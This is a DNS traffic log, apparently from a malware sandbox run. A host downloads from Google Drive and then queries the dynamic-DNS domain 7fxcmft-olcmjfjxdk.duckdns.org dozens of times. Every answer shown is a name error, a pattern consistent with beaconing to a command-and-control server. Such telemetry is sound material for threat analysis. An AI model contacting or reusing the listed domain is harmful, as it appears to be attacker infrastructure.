Jul 5, 2024 07:33:32.730817080 CEST	192.168.11.20	1.1.1.1	0x5f65	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:41.577270031 CEST	192.168.11.20	1.1.1.1	0x26dc	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:41.698573112 CEST	192.168.11.20	1.1.1.1	0xba7b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:45.826467991 CEST	192.168.11.20	1.1.1.1	0x399a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:49.950337887 CEST	192.168.11.20	1.1.1.1	0xeefb	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:50.071043015 CEST	192.168.11.20	1.1.1.1	0xdc6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:54.199400902 CEST	192.168.11.20	1.1.1.1	0x4770	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:54.324243069 CEST	192.168.11.20	1.1.1.1	0xb40b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:58.448565006 CEST	192.168.11.20	1.1.1.1	0x6d5d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:02.572613955 CEST	192.168.11.20	1.1.1.1	0x4e3b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:02.692707062 CEST	192.168.11.20	1.1.1.1	0x1a29	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:06.821726084 CEST	192.168.11.20	1.1.1.1	0x5bd7	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 5, 2024 07:26:11.693717957 CEST	1.1.1.1	192.168.11.20	0xbee0	No error (0)	drive.google.com		142.250.191.110	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:12.352868080 CEST	1.1.1.1	192.168.11.20	0x2f6a	No error (0)	drive.usercontent.google.com		142.250.191.129	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:14.912834883 CEST	1.1.1.1	192.168.11.20	0x381b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:15.092091084 CEST	1.1.1.1	192.168.11.20	0x6ac5	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:19.763504982 CEST	1.1.1.1	192.168.11.20	0xbd38	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:19.884185076 CEST	1.1.1.1	192.168.11.20	0x3c9a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:24.042646885 CEST	1.1.1.1	192.168.11.20	0x4f11	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:28.197731018 CEST	1.1.1.1	192.168.11.20	0x8008	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:28.349467993 CEST	1.1.1.1	192.168.11.20	0x99f6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:32.512650967 CEST	1.1.1.1	192.168.11.20	0x8184	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:32.665925980 CEST	1.1.1.1	192.168.11.20	0x4da0	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:36.821645021 CEST	1.1.1.1	192.168.11.20	0xe47e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:40.978877068 CEST	1.1.1.1	192.168.11.20	0x1519	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:41.132599115 CEST	1.1.1.1	192.168.11.20	0x4bb3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:45.290874004 CEST	1.1.1.1	192.168.11.20	0x1ee3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:45.411761045 CEST	1.1.1.1	192.168.11.20	0xf550	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:49.569017887 CEST	1.1.1.1	192.168.11.20	0xb086	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:53.723236084 CEST	1.1.1.1	192.168.11.20	0x4c74	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:53.875667095 CEST	1.1.1.1	192.168.11.20	0x966d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:57.778305054 CEST	1.1.1.1	192.168.11.20	0xcf94	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:01.176511049 CEST	1.1.1.1	192.168.11.20	0x328d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:01.375874043 CEST	1.1.1.1	192.168.11.20	0x58ec	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:04.347569942 CEST	1.1.1.1	192.168.11.20	0x9a4e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:06.908751011 CEST	1.1.1.1	192.168.11.20	0x2225	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:07.061808109 CEST	1.1.1.1	192.168.11.20	0x5be2	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:09.346240997 CEST	1.1.1.1	192.168.11.20	0xa759	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:13.470650911 CEST	1.1.1.1	192.168.11.20	0x3a6d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:13.629506111 CEST	1.1.1.1	192.168.11.20	0xa035	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:17.801103115 CEST	1.1.1.1	192.168.11.20	0x4c97	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:21.937886000 CEST	1.1.1.1	192.168.11.20	0xfa84	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:22.059279919 CEST	1.1.1.1	192.168.11.20	0x47f8	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:26.193334103 CEST	1.1.1.1	192.168.11.20	0xf134	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:30.356297970 CEST	1.1.1.1	192.168.11.20	0x5e0e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:30.477890015 CEST	1.1.1.1	192.168.11.20	0xe906	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:34.636965990 CEST	1.1.1.1	192.168.11.20	0xfc4f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:38.792823076 CEST	1.1.1.1	192.168.11.20	0xa35c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:38.914048910 CEST	1.1.1.1	192.168.11.20	0x9fb4	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:43.089795113 CEST	1.1.1.1	192.168.11.20	0xfb91	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:47.212997913 CEST	1.1.1.1	192.168.11.20	0xf11a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:47.335232019 CEST	1.1.1.1	192.168.11.20	0x22e3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:51.197029114 CEST	1.1.1.1	192.168.11.20	0x354c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:54.566478968 CEST	1.1.1.1	192.168.11.20	0xc3c8	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:54.694252014 CEST	1.1.1.1	192.168.11.20	0xa0cc	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:57.635227919 CEST	1.1.1.1	192.168.11.20	0x1200	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:00.196726084 CEST	1.1.1.1	192.168.11.20	0x3b19	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:00.323390961 CEST	1.1.1.1	192.168.11.20	0x7a7a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:02.594849110 CEST	1.1.1.1	192.168.11.20	0x6f02	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:04.570066929 CEST	1.1.1.1	192.168.11.20	0x9706	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:04.711505890 CEST	1.1.1.1	192.168.11.20	0xc324	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:06.445421934 CEST	1.1.1.1	192.168.11.20	0x184d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:07.946129084 CEST	1.1.1.1	192.168.11.20	0xce9d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:09.296989918 CEST	1.1.1.1	192.168.11.20	0xe7b7	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:09.419917107 CEST	1.1.1.1	192.168.11.20	0x3abc	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:10.593676090 CEST	1.1.1.1	192.168.11.20	0x93f1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:11.656068087 CEST	1.1.1.1	192.168.11.20	0x5aae	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:12.598097086 CEST	1.1.1.1	192.168.11.20	0x9245	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:13.410137892 CEST	1.1.1.1	192.168.11.20	0x6560	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:17.535032034 CEST	1.1.1.1	192.168.11.20	0x87c1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:17.655632973 CEST	1.1.1.1	192.168.11.20	0xcb10	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:21.786946058 CEST	1.1.1.1	192.168.11.20	0x11c5	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:25.923883915 CEST	1.1.1.1	192.168.11.20	0x4a3e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:26.045021057 CEST	1.1.1.1	192.168.11.20	0x200	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:30.203943014 CEST	1.1.1.1	192.168.11.20	0x39ff	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:34.363583088 CEST	1.1.1.1	192.168.11.20	0x8bcf	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:34.496424913 CEST	1.1.1.1	192.168.11.20	0xde50	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:38.633492947 CEST	1.1.1.1	192.168.11.20	0x7e1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:42.762197971 CEST	1.1.1.1	192.168.11.20	0xe4fe	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:42.883127928 CEST	1.1.1.1	192.168.11.20	0xbb6f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:47.011396885 CEST	1.1.1.1	192.168.11.20	0x48f9	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:51.136075974 CEST	1.1.1.1	192.168.11.20	0x3ccc	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:51.256442070 CEST	1.1.1.1	192.168.11.20	0x1d00	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:55.416440964 CEST	1.1.1.1	192.168.11.20	0x8ef0	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:55.544126034 CEST	1.1.1.1	192.168.11.20	0xe7ed	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:28:59.681596994 CEST	1.1.1.1	192.168.11.20	0x1433	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:03.805919886 CEST	1.1.1.1	192.168.11.20	0xcce1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:03.926783085 CEST	1.1.1.1	192.168.11.20	0x67e8	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:08.053611040 CEST	1.1.1.1	192.168.11.20	0xee67	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:12.178666115 CEST	1.1.1.1	192.168.11.20	0xcc8e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:12.299942017 CEST	1.1.1.1	192.168.11.20	0x6c9b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:16.428664923 CEST	1.1.1.1	192.168.11.20	0xc8f9	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:16.549546957 CEST	1.1.1.1	192.168.11.20	0xefd4	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:20.676075935 CEST	1.1.1.1	192.168.11.20	0x4da0	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:24.800678968 CEST	1.1.1.1	192.168.11.20	0x96d6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:24.934277058 CEST	1.1.1.1	192.168.11.20	0x5ec9	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:29.064656973 CEST	1.1.1.1	192.168.11.20	0xf5a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:33.190165043 CEST	1.1.1.1	192.168.11.20	0xbc16	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:33.310931921 CEST	1.1.1.1	192.168.11.20	0x46ea	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:37.438183069 CEST	1.1.1.1	192.168.11.20	0x3998	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:37.571479082 CEST	1.1.1.1	192.168.11.20	0xaaeb	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:41.703103065 CEST	1.1.1.1	192.168.11.20	0x5320	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:45.827409029 CEST	1.1.1.1	192.168.11.20	0x6cab	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:45.948152065 CEST	1.1.1.1	192.168.11.20	0x25c9	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:50.076303959 CEST	1.1.1.1	192.168.11.20	0x8f11	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:54.200476885 CEST	1.1.1.1	192.168.11.20	0xdffe	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:54.320892096 CEST	1.1.1.1	192.168.11.20	0xde04	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:58.449384928 CEST	1.1.1.1	192.168.11.20	0x1aa	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:29:58.570199013 CEST	1.1.1.1	192.168.11.20	0x4418	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:02.699516058 CEST	1.1.1.1	192.168.11.20	0x280d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:06.827464104 CEST	1.1.1.1	192.168.11.20	0xfb3e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:06.948215008 CEST	1.1.1.1	192.168.11.20	0x928f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:11.071708918 CEST	1.1.1.1	192.168.11.20	0x7e39	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:15.196222067 CEST	1.1.1.1	192.168.11.20	0x9f3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:15.317101955 CEST	1.1.1.1	192.168.11.20	0xba22	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:19.466778040 CEST	1.1.1.1	192.168.11.20	0x8c19	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:19.590540886 CEST	1.1.1.1	192.168.11.20	0x91c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:23.725225925 CEST	1.1.1.1	192.168.11.20	0xb7c1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:27.851479053 CEST	1.1.1.1	192.168.11.20	0x72b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:27.972261906 CEST	1.1.1.1	192.168.11.20	0x77ba	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:32.098470926 CEST	1.1.1.1	192.168.11.20	0xedaf	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:36.222517967 CEST	1.1.1.1	192.168.11.20	0x2b45	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:36.342986107 CEST	1.1.1.1	192.168.11.20	0x3bba	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:40.471065998 CEST	1.1.1.1	192.168.11.20	0x2b30	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:40.591197014 CEST	1.1.1.1	192.168.11.20	0x2426	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:44.721093893 CEST	1.1.1.1	192.168.11.20	0xd793	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:48.845314026 CEST	1.1.1.1	192.168.11.20	0x1662	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:48.965588093 CEST	1.1.1.1	192.168.11.20	0x4e63	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:53.093472004 CEST	1.1.1.1	192.168.11.20	0x730d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:57.217433929 CEST	1.1.1.1	192.168.11.20	0xbd9b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:30:57.338304043 CEST	1.1.1.1	192.168.11.20	0xb1b3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:01.466403961 CEST	1.1.1.1	192.168.11.20	0xf348	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:01.587946892 CEST	1.1.1.1	192.168.11.20	0x6a30	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:05.715325117 CEST	1.1.1.1	192.168.11.20	0xec6c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:09.870480061 CEST	1.1.1.1	192.168.11.20	0xdf98	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:09.991816998 CEST	1.1.1.1	192.168.11.20	0xbd35	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:14.121352911 CEST	1.1.1.1	192.168.11.20	0xf38f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:18.245685101 CEST	1.1.1.1	192.168.11.20	0xf9b5	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:18.368042946 CEST	1.1.1.1	192.168.11.20	0x43c3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:22.493402958 CEST	1.1.1.1	192.168.11.20	0x3bde	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:26.625016928 CEST	1.1.1.1	192.168.11.20	0xa4bc	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:26.753420115 CEST	1.1.1.1	192.168.11.20	0x1fc2	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:30.881975889 CEST	1.1.1.1	192.168.11.20	0x7287	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:35.006261110 CEST	1.1.1.1	192.168.11.20	0xc692	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:35.127574921 CEST	1.1.1.1	192.168.11.20	0x2a41	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:39.255625963 CEST	1.1.1.1	192.168.11.20	0xe0ca	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:39.379748106 CEST	1.1.1.1	192.168.11.20	0xabbe	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:43.504460096 CEST	1.1.1.1	192.168.11.20	0x5126	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:47.628042936 CEST	1.1.1.1	192.168.11.20	0xb4fb	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:47.749085903 CEST	1.1.1.1	192.168.11.20	0xe49b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:51.884645939 CEST	1.1.1.1	192.168.11.20	0x1f77	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
